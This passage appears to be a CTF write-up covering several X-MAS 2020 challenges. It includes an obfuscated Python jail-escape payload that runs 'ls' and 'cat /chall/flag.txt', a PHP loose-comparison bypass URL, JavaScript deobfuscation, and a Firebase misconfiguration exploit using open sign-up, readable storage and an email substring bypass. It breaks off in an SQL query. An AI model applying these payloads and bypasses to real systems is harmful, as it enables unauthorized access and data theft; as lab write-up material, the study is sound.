et(
vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time)))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c))))

getattr(time,'bad')(ls)

getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))) = ls

getattr(time,'bad')((ls,/chall))

getattr(time,min(set(vars())))((getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(time,min(set(vars(time)))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//
hash(c)),hash(c)//hash(c)),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(ti
me,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))))) = (ls,/chall)

getattr(time,'bad')((cat,/chall/flag.txt))

getattr(time,min(set(vars())))((getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,m
in(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(getattr(str,min(set(vars(str))))(chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(time,min(set(vars(time)))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(se
t(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(time,min(set(vars(time)))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),
getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(
int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(time,min(set(vars(time)))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(
str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)))),chr(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(getattr(int,min(set(vars(str))))(int(getattr(str,min(set(vars(str))))(str(getattr(time,min(set(vars(time))))),str(getattr(time,min(set(vars(time))))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),getattr(time,min(set(vars(time))))),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c)),hash(c)//hash(c))))))

PHP Master

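strpos() is case-sensitive and only checks for a lowercase 'e', so the filter can be bypassed with an uppercase exponent: '3E2' is a numeric string that PHP's loose == comparison treats as equal to '300'.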

<?php

// Challenge source: prints $flag when two GET parameters differ as strings
// but still compare equal under PHP's loose (==) comparison.
include('flag.php');

// Both values are read straight from the query string (caller-controlled).
$p1 = $_GET['param1'];
$p2 = $_GET['param2'];

// With either parameter missing, show this file's own source and stop.
if(!isset($p1) || !isset($p2)) {
    highlight_file(__FILE__);
    die();
}

// Guards, in order: no 'e' in either value, same length, not strictly
// identical, first character of $p1 not loosely equal to '0', loosely equal.
// NOTE(review): strpos() is case-sensitive, so only lowercase 'e' is rejected.
// An uppercase 'E' exponent still forms a numeric string, and == compares two
// numeric strings by value rather than byte-for-byte. Code that must compare
// strings should use === and validate numeric input explicitly (for example
// with ctype_digit()) instead of filtering single characters.
if(strpos($p1, 'e') === false && strpos($p2, 'e') === false  && strlen($p1) === strlen($p2) && $p1 !== $p2 && $p1[0] != '0' && $p1 == $p2) {
    die($flag);
}

?>
http://challs.xmas.htsp.ro:3000/?param1=300&param2=3E2
X-MAS{s0_php_m4ny_skillz-69acb43810ed4c42}

Santa's consolation

We can get the flag by analyzing the JavaScript.

/**
 * Undo the layered encoding of the challenge string and return the flag.
 *
 * Layers, outermost first: base64, character reversal, removal of the first
 * 'REDACTED0000' marker, base64 again, '|'-separated character codes,
 * URI decoding, removal of every '[]', then a leetspeak substitution
 * (a->4, e->3, i->1, t->7, z->_).
 */
function reverse(s) {
    // Outer layer: base64 decode, then flip the character order.
    const outer = atob(s);
    let flipped = "";
    for (let idx = outer.length - 1; idx >= 0; idx--) {
        flipped += outer[idx];
    }

    // Inner layer: drop the first marker occurrence and base64 decode again.
    const codes = atob(flipped.replace('REDACTED0000', '')).split('|');

    // Each '|'-separated field is one character code.
    let text = "";
    for (const code of codes) {
        text += String.fromCharCode(code);
    }
    text = decodeURI(text).split('[]').join("");

    // Substitutions are applied one after another, in this exact order.
    const substitutions = [[/a/g, "4"], [/e/g, "3"], [/i/g, "1"], [/t/g, "7"], [/z/g, "_"]];
    for (const [pattern, replacement] of substitutions) {
        text = text.replace(pattern, replacement);
    }
    return `X-MAS{${text}}`;
}

reverse('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')
X-MAS{s4n74_w1sh3s_y0u_cr4c1un_f3r1c17}

The Big Election Hack

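First, the challenge site uses Firebase, and its client configuration is embedded in the page, so we can sign up for an account with it. (A Firebase web config is meant to be public; what matters here is that sign-up is open and what the Firestore and Storage rules allow any signed-in user to read.)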

{
  apiKey: "AIzaSyDUOa5rtOnbVbF7T7ivUeBBR78L2tkODmY",
  authDomain: "official-wawanakwa-elections.firebaseapp.com",
  databaseURL: "https://official-wawanakwa-elections.firebaseio.com",
  projectId: "official-wawanakwa-elections",
  storageBucket: "official-wawanakwa-elections.appspot.com",
  messagingSenderId: "95856642143",
  appId: "1:95856642143:web:8b7fd33b805fadf104f3ea"
};

// Registers a new email/password account through the Firebase Auth client SDK.
firebase.auth().createUserWithEmailAndPassword('test@03sunf.com', '123123');

After logging in with the registered account, we can read the stats collection. It holds two documents.

// Read the whole "stats" collection; for each document log its id, then
// fetch it again by id and log its fields.
firebase.firestore().collection("stats").get().then((snapshot) => {
    snapshot.docs.forEach(({ id }) => {
        console.log(id);
        firebase.firestore().collection("stats").doc(id).get().then((entry) => {
            console.log(entry.data());
        });
    });
});
/*
{
  "winner":"[redacted]",
  "note_to_admin":"restrict access to the '/secret' collection",
  "winner_party":"[redacted]"
}
{
  "winner_party":"The Pink Party",
  "winner":"Chris McLean"
}
*/

We can also read the secret collection, which returns this message.

// Read the whole "secret" collection; for each document log its id, then
// fetch it again by id and log its fields.
firebase.firestore().collection("secret").get().then((snapshot) => {
    snapshot.docs.forEach(({ id }) => {
        console.log(id);
        firebase.firestore().collection("secret").doc(id).get().then((entry) => {
            console.log(entry.data());
        });
    });
});
/*
{
  "comment":"Backups are kept in the project's default bucket. Hail Hydra!"
}
*/

We already know the storage bucket address, so we can list its objects and get a reference URL.

# Listing objects in bucket
# Load 'https://www.gstatic.com/firebasejs/8.1.1/firebase-storage.js'
// List the objects at the root of the default bucket and log each object's
// name together with the bucket it lives in.
firebase.storage().ref().listAll().then(({ items }) => {
    for (const item of items) {
        console.log(`${item.name} -> ${item.bucket}`);
    }
});
/*
ArrayOfPower:) -> official-wawanakwa-elections.appspot.com
WhyCanIWriteToThisDir?.bat -> official-wawanakwa-elections.appspot.com
index.js -> official-wawanakwa-elections.appspot.com
*/



# Extract reference URL of index.js
// Resolve a download URL for index.js in the default bucket and log it.
r = firebase.storage().ref().child('index.js');
r.getDownloadURL().then((downloadUrl) => console.log(downloadUrl));
/*
https://firebasestorage.googleapis.com/v0/b/official-wawanakwa-elections.appspot.com/o/index.js?alt=media&token=bf68a747-6948-43ac-b976-9fa1e74b2e3d
*/

This gives us the source of the Cloud Function setResults2020. It requires an account whose email contains kuhi.to, and that email must be verified.

const functions = require('firebase-functions');

// Callable Cloud Function: returns the flag when the caller passes the
// elector check below and submits "The Orange Party" as winner_party.
exports.setResults2020 = functions.https.onCall((data, context) => {
	// make sure the user is a real elector
	// NOTE(review): includes("kuhi.to") is a substring test over the whole
	// address, so the local part can satisfy it as well as the domain. A
	// domain restriction should compare the text after the last '@' exactly.
	// An undefined email is not caught by the === null test and would make
	// .includes() throw instead of returning the "not an elector" response.
	if(!context.auth || context.auth.token.email === null || !context.auth.token.email.includes("kuhi.to") || !context.auth.token.email_verified) {
		return {success: false, message: "You're not an elector!"};
	}
	// Only this exact party name is accepted.
	if(data.winner_party !== "The Orange Party") {
		return {success: false, message: "Nope"};
	}
	// The flag is read from the function's runtime configuration.
	return {success: true, message: "Good job! The flag is: " + functions.config().the.flag};
});

We can request an email verification.

// Asks Firebase Auth to send a verification email to the signed-in user's address.
firebase.auth().currentUser.sendEmailVerification()

After email verification, we can trigger the Cloud Function and bypass !context.auth.token.email.includes("kuhi.to") by using an email like dummykuhi.todummy@example.com, because includes() matches the substring anywhere in the address, not only in the domain.

// Invoke the setResults2020 callable with the winner_party value the function
// source compares against, and log the payload of the response.
firebase.functions()
  .httpsCallable('setResults2020')({"data":{"winner_party":"The Orange Party"}})
  .then(({ data }) => {
    console.log(data);
  });

But the server returns a response like this.

{
  "result":{
    "success":false,
    "message":"I know this is kind of unfair, but you need to use an email address that was created before you started working on this challenge. If you think this is a mistake, PM yakuhito. If you're using a catch-all email address on your domain, choose one particular address from that domain that DOES NOT include 'kuhi.to' (e.g. person@domain.com) and bypass the checks using it."
  }
}

The deployed function presumably has an extra check around kuhi.to that is not in the source we downloaded, but an address such as $+-*&/=?^{}~_kuhi.to@03sunf.com can still be verified and gets past that check we could not inspect.

Message-ID: <00000000000015240105b67c2da1@google.com>
Date: Tue, 15 Dec 2020 08:02:12 +0000
Subject: Wawanakwa Election - Account Confirmation
From: yakuhito <noreply@official-wawanakwa-elections.firebaseapp.com>
To: $+-*&/=?^{}~_kuhi.to@03sunf.com
Content-Type: multipart/alternative; boundary="0000000000001523f405b67c2d9e"

--0000000000001523f405b67c2d9e
Content-Type: text/plain; charset="UTF-8"; format=flowed; delsp=yes

Hello,

Follow this link to verify your email address.

https://official-wawanakwa-elections.firebaseapp.com/__/auth/action?mode=verifyEmail&oobCode=ppYZRBDgtG0Xil4IYSuQzJVeMuqMGPp9EsBUt-XFuj4AAAF2ZWvLMQ&apiKey=AIzaSyDUOa5rtOnbVbF7T7ivUeBBR78L2tkODmY&lang=en

If you didn't ask to verify this address, you can ignore this email.

Thanks,

Your Official Wawanakwa Election App team

--0000000000001523f405b67c2d9e
X-MAS{oh_no_the_orange_party_has_the_nuclear_button-061b5d6be235263e}

World's most complex SQL Query

There is a SQL Query on the site.

SELECT   o 
FROM     ( 
                SELECT 0  v, 
                       '' o, 
                       0  pc 
                FROM   ( 
                              SELECT @pc:=0, 
                                     @mem:='', 
                                     @out:='') i 
                UNION ALL 
                SELECT v, 
                       CASE @pc 
                              WHEN 121 THEN 0 
                              WHEN 70 THEN @pc:=73 
                              WHEN 87 THEN IF(@x3 = 'a', 0, @pc:=89) 
                              WHEN 32 THEN @sp := @sp + 1 
                              WHEN 25 THEN @sp := @sp - 1 
                              WHEN 28 THEN @sp := @sp + 1 
                              WHEN 56 THEN @sp := @sp + 1 
                              WHEN 18 THEN IF(Bin(Ascii(@prt)) NOT LIKE '1111011', @pc:=89, 0) 
                              WHEN 126 THEN 0 
                              WHEN 17 THEN @prt := 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 5) 
                              WHEN 12 THEN IF( 
                                               ( 
                                               SELECT n 
                                               FROM FLAG 
                                               WHERE id = 2) = 'M', 0, @pc:=80) 
                              WHEN 11 THEN IF(@count = @targetsz, 0, @pc:=89) 
                              WHEN 103 THEN @sp := @sp + 1 
                              WHEN 41 THEN IF(Instr(@e, '?') > 0, 0, @pc:=43)
                              WHEN 81 THEN 
                                     ( 
                                            SELECT @x1 := n 
                                            FROM FLAG 
                                            WHERE id = 4) 
                              WHEN 49 THEN IF(Substr(@dat, @i - 1, 3) NOT LIKE Reverse('%tao%'), @pc:=124, 0)
                              WHEN 73 THEN 0 
                              WHEN 82 THEN 
                                     ( 
                                            SELECT @x2 := n 
                                            FROM FLAG 
                                            WHERE id = 5) 
                              WHEN 58 THEN @sp := @sp + 1 
                              WHEN 92 THEN 0 
                              WHEN 85 THEN 
                                     ( 
                                            SELECT @x3 := n 
                                            FROM FLAG 
                                            WHERE id = 6) 
                              WHEN 64 THEN IF( here
                                               ( 
                                               SELECT Field((Coalesce( 
                                                                       ( 
                                                                       SELECT Group_concat(n SEPARATOR '')
                                                                       FROM FLAG 
                                                                       WHERE id IN (17, 
                                                                                     Ascii(@e)/3-3, 
                                                                                     ( 
                                                                                            SELECT @xx := Ceiling(Ascii(@f)/3)+1))), '78')), 'ATT', 'BXX', 'ENN', 'FPP', 'VMM', 'PSS', 'ZEE', 'YDD', 'PPP')) = Floor(@xx / 4), 0, @pc:=89)
                              WHEN 95 THEN IF(@n = 0, 0, @pc:=99) 
                              WHEN 74 THEN @i := @i + 1 
                              WHEN 68 THEN 
                                     ( 
                                            SELECT @e := Concat_ws('AVION', 
                                                   ( 
                                                          SELECT n 
                                                          FROM FLAG 
                                                          WHERE id = @i))) 
                              WHEN 78 THEN @out := @ok 
                              WHEN 107 THEN @sp := @sp - 1 
                              WHEN 21 THEN @sp := @sp  + 1 
                              WHEN 83 THEN IF(@x1 = 'd', 0, @pc:=89) 
                              WHEN 104 THEN @mem:=Updatexml(@mem,'/m[$@sp]',Concat('<m>',@pc+2,'</m>'))
                              WHEN 31 THEN @mem:=Updatexml(@mem,'/m[$@sp]',Concat('<m>',@pc+2,'</m>'))
                              WHEN 122 THEN @sp := @sp - 1 
                              WHEN 102 THEN @mem:=Updatexml(@mem,'/m[$@sp]',Concat('<m>',@n - 1,'</m>'))
                              WHEN 45 THEN 0 
                              WHEN 93 THEN @get_arg_tmp := @sp-2 
                              WHEN 26 THEN @prt := 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 6) 
                              WHEN 86 THEN 
                                     ( 
                                            SELECT @x4 := n 
                                            FROM FLAG 
                                            WHERE id = 7) 
                              WHEN 69 THEN IF(instr( 
                                     ( 
